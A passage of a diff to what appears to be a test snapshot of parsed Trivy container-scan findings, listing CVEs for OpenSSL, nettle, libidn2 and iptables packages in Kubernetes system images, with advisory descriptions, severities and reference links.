"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "http://www.securitytracker.com/id/1029190", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "http://www.securitytracker.com/id?1025997", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "http://www.securitytracker.com/id?1026103", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "http://www.securitytracker.com/id?1026704", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "http://www.ubuntu.com/usn/USN-1263-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://access.redhat.com/security/cve/CVE-2011-3389", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", - ], - }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://hermes.opensuse.org/messages/13154861", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://hermes.opensuse.org/messages/13155432", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://ubuntu.com/security/notices/USN-1263-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2097", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20305", + "installedVersion": "3.4.1-1", + "packageName": "libhogweed4", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2097", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", - "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", - "https://linux.oracle.com/cve/CVE-2022-2097.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", - "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220715-0011/", - "https://security.netapp.com/advisory/ntap-20230420-0008/", - "https://ubuntu.com/security/notices/USN-5502-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2097", - "https://www.debian.org/security/2023/dsa-5343", - "https://www.openssl.org/news/secadv/20220705.txt", + "https://access.redhat.com/security/cve/CVE-2021-20305", + "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "https://linux.oracle.com/cve/CVE-2021-20305.html", + "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "https://security.gentoo.org/glsa/202105-31", + "https://security.netapp.com/advisory/ntap-20211022-0002/", + "https://ubuntu.com/security/notices/USN-4906-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "https://www.debian.org/security/2021/dsa-4933", ], }, "category": "Vulnerability", - "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "AES OCB fails to encrypt some bytes", + "name": "nettle: Out of bounds memory access in signature verification", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2097", + "value": "https://avd.aquasec.com/nvd/cve-2021-20305", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", + "value": "https://access.redhat.com/security/cve/CVE-2021-20305", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2097", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://security.gentoo.org/glsa/202105-31", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://ubuntu.com/security/notices/USN-4906-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://www.debian.org/security/2021/dsa-4933", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3580", + "installedVersion": "3.4.1-1", + "packageName": "libhogweed4", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-3580", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://linux.oracle.com/cve/CVE-2021-3580.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "https://security.netapp.com/advisory/ntap-20211104-0006/", + "https://ubuntu.com/security/notices/USN-4990-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3580", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://avd.aquasec.com/nvd/cve-2021-3580", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-3580", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5502-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5343", + "value": "https://ubuntu.com/security/notices/USN-4990-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220705.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4304", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-12290", + "installedVersion": "2.0.5-1+deb10u1", + "packageName": "libidn2-0", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4304", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", - "https://linux.oracle.com/cve/CVE-2022-4304.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", - "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4304", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", + "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", + "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", + "https://gitlab.com/libidn/libidn2/merge_requests/71", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", + "https://security.gentoo.org/glsa/202003-63", + "https://ubuntu.com/security/notices/USN-4168-1", + "https://usn.ubuntu.com/4168-1/", ], }, "category": "Vulnerability", - "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), arbitrary domains can be impersonated.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "timing attack in RSA Decryption implementation", + "name": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4304", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4304", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://avd.aquasec.com/nvd/cve-2019-12290", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://gitlab.com/libidn/libidn2/merge_requests/71", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://security.gentoo.org/glsa/202003-63", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://ubuntu.com/security/notices/USN-4168-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://usn.ubuntu.com/4168-1/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip4tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + 